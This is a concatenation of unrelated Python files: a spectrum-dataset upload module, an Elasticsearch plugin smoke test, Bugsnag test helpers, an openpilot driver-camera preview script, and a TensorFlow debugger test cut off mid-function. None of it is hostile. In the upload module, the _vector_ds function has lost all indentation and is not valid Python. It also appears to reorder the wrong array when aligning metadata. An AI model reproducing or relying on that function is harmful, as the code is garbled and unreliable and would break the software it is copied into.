meta_kwargs['k%d' % i] = m
# make sure there's no whitespace sticking to the pkeys
meta_pkeys = np.array(meta.pkey.values, dtype='U', copy=False)
meta_pkeys = np.char.strip(meta_pkeys)
return meta_kwargs, meta_pkeys, None
def _traj_ds(fh, ds_name, ds_kind, meta_kwargs, meta_pkeys, resample,
             description):
    """Import a ZIP of per-spectrum files as a trajectory dataset.

    Returns None on success, or a (status, message) error tuple. When
    `resample` is given, every trajectory is interpolated onto a common
    wavelength axis and registered as a vector dataset instead.
    """
    # sanity check before doing the hard work
    if resample is None and ds_kind == 'LIBS':
        return (415, 'Failed: LIBS data must be sampled on a common x-axis')
    zf = ZipFile(fh)
    traj_data = {}
    for subfile in zf.infolist():
        if subfile.file_size <= 0:
            continue
        # ignore directory prefixes
        fname = os.path.basename(subfile.filename)
        # ignore hidden files
        if fname.startswith('.'):
            continue
        # read and wrap, because the ZipExtFile object isn't seekable
        sub_fh = UncloseableBytesIO(zf.open(subfile).read())
        try:
            # TODO: ensure each traj has wavelengths in increasing order
            traj_data[fname] = parse_spectrum(sub_fh)
        except Exception:
            logging.exception('bad spectrum subfile: ' + fname)
            return (415, 'Unable to parse spectrum file: %s' % fname)
    num_meta = len(meta_pkeys)
    num_traj = len(traj_data)
    # No metadata at all: fall back to filenames as primary keys.
    if num_meta == 0:
        meta_pkeys = list(traj_data.keys())
    elif num_meta != num_traj:
        return (415, 'Failed: %d metadata entries for %d spectra' % (num_meta,
                                                                     num_traj))
    else:
        # Every metadata pkey must match an extracted spectrum filename.
        for pkey in meta_pkeys:
            if pkey not in traj_data:
                return (415, 'Failed: %r not in spectra.' % pkey)
    if resample is None:
        _load = _make_loader_function(description, meta_pkeys, traj_data,
                                      **meta_kwargs)
        WebTrajDataset(ds_name, ds_kind, _load)
    else:
        # Interpolate all trajectories onto one shared wavelength grid.
        lb, ub, step = list(map(_maybe_float, resample))
        waves = [t[:, 0] for t in traj_data.values()]
        # Defaults: bounds are the intersection of all native ranges;
        # step is the finest native spacing observed.
        if lb is None:
            lb = max(w[0] for w in waves)
        if ub is None:
            ub = min(w[-1] for w in waves)
        if step is None:
            step = min(np.diff(w).min() for w in waves)
        # + step/2 makes the upper bound inclusive despite float error.
        wave = np.arange(lb, ub + step / 2, step, dtype=waves[0].dtype)
        spectra = np.zeros((len(waves), len(wave)), dtype=wave.dtype)
        for i, key in enumerate(meta_pkeys):
            traj = traj_data[key]
            spectra[i] = np.interp(wave, traj[:, 0], traj[:, 1])
        pkey = PrimaryKeyMetadata(meta_pkeys)
        _load = _make_loader_function(description, wave, spectra, pkey=pkey,
                                      **meta_kwargs)
        WebVectorDataset(ds_name, ds_kind, _load)
    return None
def _vector_ds(fh, ds_name, ds_kind, meta_kwargs, meta_pkeys, resample,
description):
try:
pkey = np.array(next(fh).strip().split(b',')[1:])
data = np.genfromtxt(fh, dtype=np.float32, delimiter=b',', unpack=True)
wave = data[0]
spectra = data[1:]
except Exception:
logging.exception('Bad spectra file.')
return visible_error(415, 'Unable to parse spectrum data CSV.')
# cut out empty columns (where pkey is '')
mask = pkey != b''
if not mask.all():
pkey = pkey[mask]
spectra = spectra[mask]
# cut out empty rows (where wave is NaN)
mask = np.isfinite(wave)
if not mask.all():
wave = wave[mask]
spectra = spectra[:, mask]
if ds_kind == 'LIBS' and wave.shape[0] not in (6144, 6143, 5485):
logging.info('wave.shape[0]: {}'.format(wave.shape[0]))
# make sure there's no whitespace sticking to the pkeys
pkey = np.char.strip(pkey).astype(str, copy=False)
if len(meta_pkeys) > 0 and not np.array_equal(meta_pkeys, pkey):
if len(meta_pkeys) != len(pkey):
return (415, 'Spectrum and metadata names mismatch.',
'wrong number of meta_pkeys for vector data')
meta_order = np.argsort(meta_pkeys)
data_order = np.argsort(pkey)
if not np.array_equal(meta_pkeys[meta_order], pkey[data_order]):
return (415, 'Spectrum and metadata names mismatch.')
# convert data to meta order
order = data_order[meta_order]
data = data[order]
assert np.array_equal(meta_pkeys, pkey[order])
try:
pkey = PrimaryKeyMetadata(pkey)
except AssertionError: # XXX: convert this to a real error
return (415, 'Primary keys not unique.')
# make sure wave is in increasing order
order = np.argsort(wave)
if not np.array_equal(order, np.arange(len(wave))):
wave = wave[order]
spectra = spectra[:, order]
if resample is not None:
lb, ub, step = resample
lb = _maybe_float(lb, wave[0])
ub = _maybe_float(ub, wave[-1])
step = _maybe_float(step)
if step is not None:
new_wave = np.arange(lb, ub + step / 2, step, dtype=wave.dtype)
new_spectra = np.zeros((len(spectra), len(new_wave)),
dtype=spectra.dtype)
for i, y in enumerate(spectra):
new_spectra[i] = np.interp(new_wave, wave, y)
wave = new_wave
spectra = new_spectra
else:
lb_idx = np.searchsorted(wave, lb)
ub_idx = np.searchsorted(wave, ub, side='right')
spectra = spectra[:, lb_idx:ub_idx]
wave = wave[lb_idx:ub_idx]
# async loading machinery automatically registers us with DATASETS
_load = _make_loader_function(description, wave, spectra, pkey=pkey,
**meta_kwargs)
if ds_kind == 'LIBS':
WebLIBSDataset(ds_name, _load)
else:
WebVectorDataset(ds_name, ds_kind, _load)
return None
def _maybe_float(x, default=None):
try:
return float(x)
except ValueError:
return default
def _make_loader_function(desc, *args, **kwargs):
def _load(ds):
ds.set_data(*args, **kwargs)
ds.is_public = False
ds.user_added = True
ds.description = desc
return True
return _load
def _hdf5_filename(ds_kind, ds_name):
safe_name = re.sub(r'(?u)[^-\w.]', '_', ds_name)
return '%s_%s.hdf5' % (ds_kind, safe_name)
def _save_ds(ds_kind, ds_name):
    """Persist a freshly-uploaded dataset to disk as hdf5 and register
    it in the user_data.yml config. Runs on a background thread."""
    # Wait for the new dataset to finish registering.
    time.sleep(1)
    for _ in range(60):
        if ds_name in DATASETS[ds_kind]:
            break
        logging.info('Waiting for %s [%s] to register...', ds_name, ds_kind)
        time.sleep(1)
    # Save the new dataset to disk as a canonical hdf5.
    ds = DATASETS[ds_kind][ds_name]
    # XXX: this path manipulation is pretty hacky
    outdir = os.path.normpath(os.path.join(os.path.dirname(__file__),
                                           '../../uploads'))
    outname = os.path.join(outdir, _hdf5_filename(ds_kind, ds_name))
    logging.info('Writing %s to disk: %s', ds, outname)
    # Set up the config entry.
    entry = dict(
        vector=(not isinstance(ds, WebTrajDataset)),
        file=os.path.abspath(outname),
        description=ds.description,
        public=ds.is_public,
        metadata=[])
    # TODO: move this logic to superman.dataset
    with h5py.File(outname, 'w') as fh:
        if entry['vector']:
            # Vector data: one 2-d intensities array + shared wave axis.
            fh['/spectra'] = ds.intensities
            fh['/meta/waves'] = ds.bands
        else:
            # Trajectory data: one array per primary key.
            for key, traj in ds.traj.items():
                fh['/spectra/' + key] = traj
        if ds.pkey is not None:
            fh['/meta/pkey'] = np.char.encode(ds.pkey.keys, 'utf8')
            entry['metadata'].append(('pkey', 'PrimaryKeyMetadata', None))
        for key, m in ds.metadata.items():
            try:
                arr = np.array(m.get_array())
            except BaseException:
                # Best effort: skip metadata that cannot be materialized.
                logging.exception(
                    'Failed to get_array for %s /meta/%s', ds, key)
                continue
            # h5py can't store unicode arrays directly; encode to bytes.
            if arr.dtype.char == 'U':
                arr = np.char.encode(arr, 'utf8')
            fh['/meta/' + key] = arr
            entry['metadata'].append(
                [key, type(m).__name__, m.display_name(key)])
    # Clean up if no metadata was added.
    if not entry['metadata']:
        del entry['metadata']
    # Update the user-uploaded dataset config with the new dataset.
    config_path = os.path.join(outdir, 'user_data.yml')
    if os.path.exists(config_path):
        config = yaml.safe_load(open(config_path))
    else:
        config = {}
    if ds_kind not in config:
        config[ds_kind] = {ds_name: entry}
    else:
        config[ds_kind][ds_name] = entry
    with open(config_path, 'w') as fh:
        yaml.safe_dump(config, fh, allow_unicode=True)
# URL routes exposed by this module: single-spectrum and whole-dataset
# upload handlers.
routes = [
    (r'/_upload_spectrum', SpectrumUploadHandler),
    (r'/_upload_dataset', DatasetUploadHandler),
]
|
smoke_test_plugins.py | # Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import datetime
import traceback
import json
import os
import shutil
import signal
import socket
import subprocess
import tempfile
import threading
import time
from http.client import HTTPConnection
# Smoke-test configuration, resolved at import time.
LOG = os.environ.get('ES_SMOKE_TEST_PLUGINS_LOG', '/tmp/elasticsearch_smoke_test_plugins.log')
print('Logging to %s' % LOG)
# Refuse to append to a stale log from a previous run.
if os.path.exists(LOG):
    raise RuntimeError('please remove old log %s first' % LOG)
# Prefer JAVA7_HOME, fall back to JAVA_HOME; abort if neither is set.
try:
    JAVA_HOME = os.environ['JAVA7_HOME']
except KeyError:
    try:
        JAVA_HOME = os.environ['JAVA_HOME']
    except KeyError:
        raise RuntimeError("""
Please set JAVA_HOME in the env before running release tool
On OSX use: export JAVA_HOME=`/usr/libexec/java_home -v '1.7*'`""")
# Shell prefix that pins the chosen JDK for every command run via run().
JAVA_ENV = 'export JAVA_HOME="%s" PATH="%s/bin:$PATH" JAVACMD="%s/bin/java"' % (JAVA_HOME, JAVA_HOME, JAVA_HOME)
try:
    # make sure mvn3 is used if mvn3 is available
    # some systems use maven 2 as default
    subprocess.check_output('mvn3 --version', shell=True, stderr=subprocess.STDOUT)
    MVN = 'mvn3'
except subprocess.CalledProcessError:
    MVN = 'mvn'
def log(msg):
    """Append *msg* (UTF-8 encoded) to the smoke-test log file."""
    # Use a context manager so the handle is closed even if write() fails.
    with open(LOG, mode='ab') as f:
        f.write(('\n'+msg).encode('utf-8'))
def run(command, quiet=False):
    """Run a shell command, appending its output to the log file.

    Raises RuntimeError when the command exits non-zero; the failure is
    also printed unless *quiet* is set.
    """
    log('%s: RUN: %s\n' % (datetime.datetime.now(), command))
    status = os.system('%s >> %s 2>&1' % (command, LOG))
    if not status:
        return
    failure = ' FAILED: %s [see log %s]' % (command, LOG)
    if not quiet:
        print(failure)
    raise RuntimeError(failure)
def readServerOutput(p, startupEvent, failureEvent):
    """Pump the Elasticsearch subprocess's stdout to our stdout.

    Sets *startupEvent* once a line ending in 'started' is seen (or the
    process exits), and *failureEvent* when the process exits or errors
    before startup completed.
    """
    try:
        while True:
            line = p.stdout.readline()
            if len(line) == 0:
                # EOF: the process exited. Starting up never completed,
                # so flag failure unless startup already happened.
                # (Event.isSet was removed in Python 3.12; use is_set.)
                p.poll()
                if not startupEvent.is_set():
                    failureEvent.set()
                startupEvent.set()
                print('ES: **process exit**\n')
                break
            line = line.decode('utf-8').rstrip()
            if line.endswith('started') and not startupEvent.is_set():
                startupEvent.set()
            print('ES: %s' % line)
    except Exception:
        # Was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; Exception is broad enough here.
        print()
        print('Exception reading Elasticsearch output:')
        traceback.print_exc()
        failureEvent.set()
        startupEvent.set()
if __name__ == '__main__':
    # Build the release artifacts, install every plugin into a fresh
    # Elasticsearch install, start it, and verify via the REST API that
    # exactly the installed plugins are loaded.
    print('Build release bits...')
    run('%s; %s clean package -DskipTests' % (JAVA_ENV, MVN))
    for f in os.listdir('core/target/releases/'):
        if f.endswith('.tar.gz'):
            artifact = f
            break
    else:
        raise RuntimeError('could not find elasticsearch release under core/target/releases/')
    tmp_dir = tempfile.mkdtemp()
    p = None
    try:
        # Extract artifact:
        run('tar -xzf core/target/releases/%s -C %s' % (artifact, tmp_dir))
        # Strip the '.tar.gz' suffix to get the install directory name.
        es_install_dir = os.path.join(tmp_dir, artifact[:-7])
        es_plugin_path = os.path.join(es_install_dir, 'bin/plugin')
        installed_plugin_names = set()
        print('Find plugins:')
        for name in os.listdir('plugins'):
            if name not in ('target', 'pom.xml'):
                url = 'file://%s/plugins/%s/target/releases/elasticsearch-%s-2.0.0-beta1-SNAPSHOT.zip' % (os.path.abspath('.'), name, name)
                print(' install plugin %s...' % name)
                run('%s; %s install %s --url %s' % (JAVA_ENV, es_plugin_path, name, url))
                installed_plugin_names.add(name)
        print('Start Elasticsearch')
        env = os.environ.copy()
        env['JAVA_HOME'] = JAVA_HOME
        env['PATH'] = '%s/bin:%s' % (JAVA_HOME, env['PATH'])
        env['JAVA_CMD'] = '%s/bin/java' % JAVA_HOME
        startupEvent = threading.Event()
        failureEvent = threading.Event()
        # Bug fix: a missing comma after the cluster.name flag made Python
        # concatenate it with the multicast flag into one bogus argument.
        p = subprocess.Popen(('%s/bin/elasticsearch' % es_install_dir,
                              '-Des.node.name=smoke_tester',
                              '-Des.cluster.name=smoke_tester_cluster',
                              '-Des.discovery.zen.ping.multicast.enabled=false',
                              '-Des.script.inline=on',
                              '-Des.script.indexed=on'),
                             stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT,
                             env=env)
        thread = threading.Thread(target=readServerOutput, args=(p, startupEvent, failureEvent))
        # setDaemon()/isSet() are removed camelCase aliases in modern
        # Python; use the attribute / snake_case forms instead.
        thread.daemon = True
        thread.start()
        startupEvent.wait(1200)
        if failureEvent.is_set():
            raise RuntimeError('ES failed to start')
        print('Confirm plugins are installed')
        conn = HTTPConnection('127.0.0.1', 9200, 20)
        conn.request('GET', '/_nodes?plugin=true&pretty=true')
        res = conn.getresponse()
        if res.status == 200:
            nodes = json.loads(res.read().decode("utf-8"))['nodes']
            for _, node in nodes.items():
                node_plugins = node['plugins']
                for node_plugin in node_plugins:
                    plugin_name = node_plugin['name']
                    if plugin_name not in installed_plugin_names:
                        # (typo fix in message: 'Unexpeced' -> 'Unexpected')
                        raise RuntimeError('Unexpected plugin %s' % plugin_name)
                    installed_plugin_names.remove(plugin_name)
            if len(installed_plugin_names) > 0:
                raise RuntimeError('Plugins not loaded %s' % installed_plugin_names)
        else:
            raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
    finally:
        # Always kill the ES process and remove the scratch install dir.
        if p is not None:
            try:
                os.kill(p.pid, signal.SIGKILL)
            except ProcessLookupError:
                pass
        shutil.rmtree(tmp_dir)
|
utils.py | import json
import time
import unittest
from threading import Thread
from http.server import SimpleHTTPRequestHandler, HTTPServer
import bugsnag
class MissingRequestError(Exception):
    """Raised when the fake server receives no request before timeout."""
class IntegrationTest(unittest.TestCase):
    """Base class for tests exercising a real (fake) Bugsnag endpoint.

    Spins up one shared FakeBugsnagServer per test class, and resets
    both the recorded requests and the global bugsnag client state
    between individual tests.
    """

    @classmethod
    def setUpClass(cls):
        cls.server = FakeBugsnagServer()

    def setUp(self):
        # Drop payloads recorded by previous tests.
        self.server.received = []

    def tearDown(self):
        # Restore a pristine global bugsnag client so configuration from
        # one test cannot leak into the next.
        bugsnag.legacy.default_client.uninstall_sys_hook()
        client = bugsnag.Client()
        client.configuration.api_key = 'some key'
        bugsnag.legacy.default_client = client
        bugsnag.legacy.configuration = client.configuration

    @classmethod
    def tearDownClass(cls):
        cls.server.shutdown()

    def assertSentReportCount(self, count):
        """Assert exactly *count* payloads were delivered to the server."""
        self.assertEqual(len(self.server.received), count)

    def assertExceptionName(self, received_index, event_index, name):
        """Assert the errorClass of the first exception in a given event
        of a recorded payload."""
        json_body = self.server.received[received_index]['json_body']
        event = json_body['events'][event_index]
        exception = event['exceptions'][0]
        self.assertEqual(exception['errorClass'], name)
class FakeBugsnagServer(object):
    """
    A server which accepts a single request, recording the JSON payload and
    other request information
    """

    def __init__(self):
        # Recorded requests: dicts with 'headers', 'json_body', 'path',
        # and 'method' keys.
        self.received = []
        # While True, do_POST spins (up to ~0.5s) before handling.
        self.paused = False

        class Handler(SimpleHTTPRequestHandler):

            def do_POST(handler):
                # The parameter is named `handler` (not `self`) so that
                # `self` in this closure still refers to the enclosing
                # FakeBugsnagServer instance.
                start = time.time()
                while self.paused:
                    if time.time() > (start + 0.5):
                        raise Exception('Paused HTTP server timeout')
                    time.sleep(0.001)
                length = int(handler.headers['Content-Length'])
                raw_body = handler.rfile.read(length).decode('utf-8')
                # Requests to /ignore are accepted but not recorded.
                if handler.path != '/ignore':
                    self.received.append({'headers': handler.headers,
                                          'json_body': json.loads(raw_body),
                                          'path': handler.path,
                                          'method': handler.command})
                handler.send_response(200)
                handler.end_headers()
                return ()

            def log_request(self, *args):
                # Silence per-request logging during tests.
                pass

        # Port 0 lets the OS pick any free port.
        self.server = HTTPServer(('localhost', 0), Handler)
        self.server.timeout = 0.5
        self.thread = Thread(target=self.server.serve_forever, args=(0.1,))
        self.thread.daemon = True
        self.thread.start()

    @property
    def address(self):
        # host:port actually bound by the OS.
        return '{0}:{1}'.format(*self.server.server_address)

    @property
    def url(self):
        return 'http://%s' % self.address

    def shutdown(self):
        # Stop serving, wait for the worker thread, release the socket.
        self.server.shutdown()
        self.thread.join()
        self.server.server_close()

    def wait_for_request(self, timeout=2):
        """Block until at least one request has been recorded.

        Raises MissingRequestError after *timeout* seconds.
        """
        start = time.time()
        while (len(self.received) == 0):
            if (time.time() - start > timeout):
                raise MissingRequestError("No request received before timeout")
            time.sleep(0.25)
class ScaryException(Exception):
    """Marker exception type raised deliberately by tests."""
|
driverview.py | #!/usr/bin/env python3
import os
import subprocess
import multiprocessing
import signal
import time
import cereal.messaging as messaging
from common.params import Params
from common.basedir import BASEDIR
KILL_TIMEOUT = 15
def send_controls_packet(pm):
    # Continuously publish controlsState messages flagged for the
    # rear-view camera preview; runs as a separate process.
    # NOTE(review): there is no sleep here, so this publishes as fast as
    # the messaging layer allows -- confirm that rate is intended.
    while True:
        dat = messaging.new_message('controlsState')
        dat.controlsState = {
            "rearViewCam": True,
        }
        pm.send('controlsState', dat)
def send_dmon_packet(pm, d):
    """Publish one dMonitoringState message.

    `d` is a 3-element sequence: (isRHD, rhdChecked, isPreview).
    """
    is_rhd, rhd_checked, is_preview = d
    msg = messaging.new_message('dMonitoringState')
    msg.dMonitoringState = {
        "isRHD": is_rhd,
        "rhdChecked": rhd_checked,
        "isPreview": is_preview,
    }
    pm.send('dMonitoringState', msg)
def main():
    """Driver-monitoring camera preview loop.

    Spawns camerad and dmonitoringmodeld, publishes controlsState (from
    a child process) and dMonitoringState messages, and tears everything
    down on SIGTERM.
    """
    pm = messaging.PubMaster(['controlsState', 'dMonitoringState'])
    controls_sender = multiprocessing.Process(target=send_controls_packet, args=[pm])
    controls_sender.start()
    # TODO: refactor with manager start/kill
    proc_cam = subprocess.Popen(os.path.join(BASEDIR, "selfdrive/camerad/camerad"), cwd=os.path.join(BASEDIR, "selfdrive/camerad"))
    proc_mon = subprocess.Popen(os.path.join(BASEDIR, "selfdrive/modeld/dmonitoringmodeld"), cwd=os.path.join(BASEDIR, "selfdrive/modeld"))
    params = Params()
    is_rhd = False
    is_rhd_checked = False
    should_exit = False
    def terminate(signalNumber, frame):
        # SIGTERM handler: announce shutdown, stop the camera/model
        # subprocesses, then exit this process.
        print('got SIGTERM, exiting..')
        # NOTE(review): without `nonlocal`, this assignment creates a
        # LOCAL should_exit; the outer loop never observes it. Harmless
        # today only because this handler exits the process itself --
        # confirm intent.
        should_exit = True
        send_dmon_packet(pm, [is_rhd, is_rhd_checked, not should_exit])
        proc_cam.send_signal(signal.SIGINT)
        proc_mon.send_signal(signal.SIGINT)
        kill_start = time.time()
        # Wait for camerad to die; force-reboot the device if it hangs
        # past KILL_TIMEOUT seconds.
        while proc_cam.poll() is None:
            if time.time() - kill_start > KILL_TIMEOUT:
                from selfdrive.swaglog import cloudlog
                cloudlog.critical("FORCE REBOOTING PHONE!")
                os.system("date >> /sdcard/unkillable_reboot")
                os.system("reboot")
                raise RuntimeError
            continue
        controls_sender.terminate()
        exit()
    signal.signal(signal.SIGTERM, terminate)
    # Publish loop: check the RHD param once, then keep publishing
    # preview dMonitoringState messages until SIGTERM arrives.
    # NOTE(review): no sleep here -- presumably throttled by the
    # messaging layer; verify.
    while True:
        send_dmon_packet(pm, [is_rhd, is_rhd_checked, not should_exit])
        if not is_rhd_checked:
            is_rhd = params.get("IsRHD") == b"1"
            is_rhd_checked = True
# Script entry point.
if __name__ == '__main__':
  main()
|
dumping_callback_test.py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tfdbg v2 dumping callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import socket
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import dumping_callback
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras import models
from tensorflow.python.keras.applications import mobilenet_v2
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.layers import recurrent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _create_simple_recurrent_keras_model(input_shape):
  """Create a simple tf.keras model containing a recurrent layer for testing."""
  lstm_layer = recurrent_v2.LSTM(
      10,
      input_shape=input_shape,
      kernel_initializer="zeros",
      recurrent_initializer="zeros")
  output_layer = core.Dense(1, kernel_initializer="zeros")
  # Passing the layer list to the constructor is equivalent to sequential
  # model.add() calls.
  model = models.Sequential([lstm_layer, output_layer])
  model.compile(loss="mse", optimizer="sgd")
  return model
# Hostname and absolute path of this test file, captured once at import time;
# the tests below compare these against the host/file metadata recorded in the
# dumped debug events.
_host_name = socket.gethostname()
_current_file_full_path = os.path.abspath(__file__)
class TracingCallbackTest(
dumping_callback_test_lib.DumpingCallbackTestBase, parameterized.TestCase):
  def setUp(self):
    """Create a fresh temporary dump-root directory for each test."""
    super(TracingCallbackTest, self).setUp()
    self.dump_root = tempfile.mkdtemp()
  def tearDown(self):
    """Remove the dump directory and disable the callback before base teardown."""
    if os.path.isdir(self.dump_root):
      shutil.rmtree(self.dump_root, ignore_errors=True)
    # Disable before super().tearDown() so later tests start from a clean state.
    dumping_callback.disable_dump_debug_info()
    super(TracingCallbackTest, self).tearDown()
def _verifyStackFrames(self, stack_frames):
"""Verify the correctness of the stack frames.
Currently, it simply asserts that the current file is found in the stack
frames.
TODO(cais): Perhaps implement a stricter check later.
Args:
stack_frames: The stack frames to verify.
"""
self.assertTrue([
frame for frame in stack_frames if frame[0] == _current_file_full_path])
def _expectedDefaultDeviceName(self):
gpu_name = test_util.gpu_device_name()
if gpu_name:
return "/job:localhost/replica:0/task:0" + gpu_name
else:
return "/job:localhost/replica:0/task:0/device:CPU:0"
  def testInvalidTensorDebugModeCausesError(self):
    """An unrecognized tensor_debug_mode string raises a descriptive ValueError."""
    with self.assertRaisesRegexp(
        ValueError,
        r"Invalid value in tensor_debug_mode \(\'NONSENSICAL\'\).*"
        r"Valid options.*NO_TENSOR.*"):
      dumping_callback.enable_dump_debug_info(
          self.dump_root, tensor_debug_mode="NONSENSICAL")
  def testDisablingTracingCallbackWithoutEnablingFirstIsTolerated(self):
    """disable_dump_debug_info() with no prior enable call is a no-op."""
    dumping_callback.disable_dump_debug_info()
  @parameterized.named_parameters(
      ("NoTensor", "NO_TENSOR"),
      ("CurtHealth", "CURT_HEALTH"),
      ("ConciseHealth", "CONCISE_HEALTH"),
      ("Shape", "SHAPE"),
      ("FullTensor", "FULL_TENSOR"),
  )
  def testPureEagerOpExecution(self, tensor_debug_mode):
    """Test dumping data from eager op execution: float32."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode=tensor_debug_mode)

    x = constant_op.constant(10.0)
    zero = constant_op.constant(0.0)
    one = constant_op.constant(1.0)
    two = constant_op.constant(2.0)
    three = constant_op.constant(3.0)
    # Use Collatz conjecture as a test case: 10 -> 5 -> 16 -> 8 -> 4 -> 2 -> 1.
    while x > one:
      if math_ops.equal(x % two, zero):
        x = x / two
      else:
        x = x * three + one

    writer.FlushNonExecutionFiles()
    self._readAndCheckMetadataFile()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      # Before FlushExecutionFiles() is called, the .execution file should be
      # empty.
      self.assertFalse(reader.executions())

      # After the flushing, the .execution file should hold the appropriate
      # contents.
      writer.FlushExecutionFiles()
      reader.update()
      executions = reader.executions()
      # Wall times must be monotonically non-decreasing across executions.
      prev_wall_time = 1
      executed_op_types = []
      tensor_values = collections.defaultdict(lambda: [])
      for execution in executions:
        self.assertGreaterEqual(execution.wall_time, prev_wall_time)
        prev_wall_time = execution.wall_time
        executed_op_types.append(execution.op_type)
        # Check the device name.
        if execution.op_type in ("AddV2", "Mul", "RealDiv"):
          self.assertLen(execution.output_tensor_device_ids, 1)
          self.assertEqual(
              reader.device_name_by_id(execution.output_tensor_device_ids[0]),
              self._expectedDefaultDeviceName(),
              "Unexpected device name from eager op %s" % execution.op_type)

        # No graph IDs should have been logged for eager op executions.
        self.assertFalse(execution.graph_id)
        self.assertTrue(execution.input_tensor_ids)
        self.assertTrue(execution.output_tensor_ids)
        self.assertEqual(
            debug_event_pb2.TensorDebugMode.keys()[execution.tensor_debug_mode],
            tensor_debug_mode)
        if tensor_debug_mode == "NO_TENSOR":
          # Due to the NO_TENSOR tensor debug mode, tensor_protos ought to
          # be empty.
          self.assertFalse(execution.debug_tensor_values)
        elif tensor_debug_mode == "CURT_HEALTH":
          self.assertLen(execution.debug_tensor_values, 1)
          if execution.op_type in ("AddV2", "Mul", "RealDiv"):
            # 1st element: -1 is the unset tensor_id for eager op execution.
            # 2nd element: 0 means there is no inf or nan.
            self.assertAllClose(execution.debug_tensor_values, [[-1.0, 0.0]])
        elif tensor_debug_mode == "CONCISE_HEALTH":
          if execution.op_type in ("AddV2", "Mul", "RealDiv"):
            # 1st element: -1 is the unset tensor_id for eager op execution.
            # 2nd element: each scalar tensor has 1 element.
            # Remaining elements: no -inf, inf or nan in these
            self.assertAllClose(
                execution.debug_tensor_values, [[-1, 1, 0, 0, 0]])
        elif tensor_debug_mode == "SHAPE":
          if execution.op_type in ("AddV2", "Mul", "RealDiv"):
            # 1st element: -1 is the unset tensor_id for eager op execution.
            # 2nd element: dtype enum value (float32).
            # 3rd element: rank (scalar).
            # 4th element: element count (4).
            # Remaining elements: shape at fixed length (6).
            self.assertAllClose(execution.debug_tensor_values,
                                [[-1, 1, 0, 1, 0, 0, 0, 0, 0, 0]])
        elif tensor_debug_mode == "FULL_TENSOR":
          tensor_values[execution.op_type].append(
              reader.execution_to_tensor_values(execution)[0])

        host_name, stack_frames = reader.read_execution_stack_trace(execution)
        self.assertEqual(host_name, _host_name)
        self._verifyStackFrames(stack_frames)

      if tensor_debug_mode == "FULL_TENSOR":
        self.assertAllClose(tensor_values["Greater"], [1, 1, 1, 1, 1, 1, 0])
        self.assertAllClose(tensor_values["RealDiv"], [5, 8, 4, 2, 1])
        self.assertAllClose(tensor_values["Mul"], [15])
        self.assertAllClose(tensor_values["AddV2"], [16])

      # One Greater/FloorMod/Equal triple per loop iteration, followed by the
      # RealDiv or Mul+AddV2 that produced the next Collatz value.
      self.assertEqual(
          executed_op_types,
          [
              "Greater",
              "FloorMod",
              "Equal",
              "RealDiv",  # 10 --> 5
              "Greater",
              "FloorMod",
              "Equal",
              "Mul",
              "AddV2",  # 5 --> 16
              "Greater",
              "FloorMod",
              "Equal",
              "RealDiv",  # 16 --> 8
              "Greater",
              "FloorMod",
              "Equal",
              "RealDiv",  # 8 --> 4
              "Greater",
              "FloorMod",
              "Equal",
              "RealDiv",  # 4 --> 2
              "Greater",
              "FloorMod",
              "Equal",
              "RealDiv",  # 2 --> 1
              "Greater"
          ])

      # Due to the pure eager op execution, the .graph file and the
      # .graph_execution_traces file ought to be empty.
      self.assertFalse(reader.outermost_graphs())
      self.assertEqual(reader.num_graph_execution_traces(), 0)
  @parameterized.named_parameters(
      ("CurtHealth", "CURT_HEALTH"),
      ("ConciseHealth", "CONCISE_HEALTH"),
      ("Shape", "SHAPE"),
  )
  @test_util.run_in_graph_and_eager_modes
  def testModesSummarizingBadNumericalValue(self, tensor_debug_mode):
    """Summarizing debug modes correctly report inf/nan values in a graph."""
    writer = dumping_callback.enable_dump_debug_info(
        self.dump_root, tensor_debug_mode=tensor_debug_mode)

    @def_function.function
    def func(x, y):
      return (x + y) / (x - y)

    x = np.array([-3, -1, 0, 0, 1, 1, 1, 2], dtype=np.float16)
    y = np.array([2, -1, 0, 0, 1, 1, 1, 3], dtype=np.float16)
    # (x + y) / (x - y) = [0.2, -inf, nan, nan, inf, inf, inf, -5].
    self.evaluate(func(x, y))

    writer.FlushNonExecutionFiles()
    writer.FlushExecutionFiles()

    with debug_events_reader.DebugDataReader(self.dump_root) as reader:
      reader.update()
      graph_exec_traces = reader.graph_execution_traces()
      executed_op_types = [trace.op_type for trace in graph_exec_traces]
      self.assertCountEqual(executed_op_types, ["AddV2", "Sub", "RealDiv"])
      if tensor_debug_mode == "CURT_HEALTH":
        for trace in graph_exec_traces:
          # 1st element: tensor_id, should be >= 0.
          # 2nd element: indicates if there is any inf or nan.
